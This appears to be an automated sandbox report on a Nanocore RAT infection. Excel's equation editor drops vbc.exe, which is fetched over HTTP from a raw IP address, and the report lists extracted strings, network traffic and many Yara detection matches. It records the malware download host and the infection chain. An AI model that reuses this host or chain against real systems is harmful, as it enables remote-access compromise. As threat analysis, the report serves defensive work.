Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178

Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000006.00000002.519010155.00000000005A1000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: sys30.exe, 00000008.00000002.524078956.0000000002ACA000.00000004.00000001.sdmp	String found in binary or memory: http://dual-a-0001.dc-msedge.net
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://n.f
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.520252057.000000000518C000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/s
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobede
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ao
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: sys30.exe	String found in binary or memory: http://tempuri.org/PendingProList.xsd
Source: sys30.exe	String found in binary or memory: http://tempuri.org/ProductDataSet.xsd
Source: sys30.exe	String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd
Source: vbc.exe, 00000006.00000002.519166195.0000000000D82000.00000020.00020000.sdmp, sys30.exe, 00000007.00000000.503536926.0000000001222000.00000020.00020000.sdmp, sys30.exe, 00000008.00000000.515458135.0000000001222000.00000020.00020000.sdmp	String found in binary or memory: http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThe
Source: sys30.exe	String found in binary or memory: http://tempuri.org/login2DataSet.xsd
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp, sys30.exe, 00000008.00000002.524598460.0000000005BB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sys30.exe, 00000008.00000002.523915323.0000000002A92000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: sys30.exe	String found in binary or memory: https://www.google.com/

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.google.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /truth/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.238.159.178Connection: Keep-Alive

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
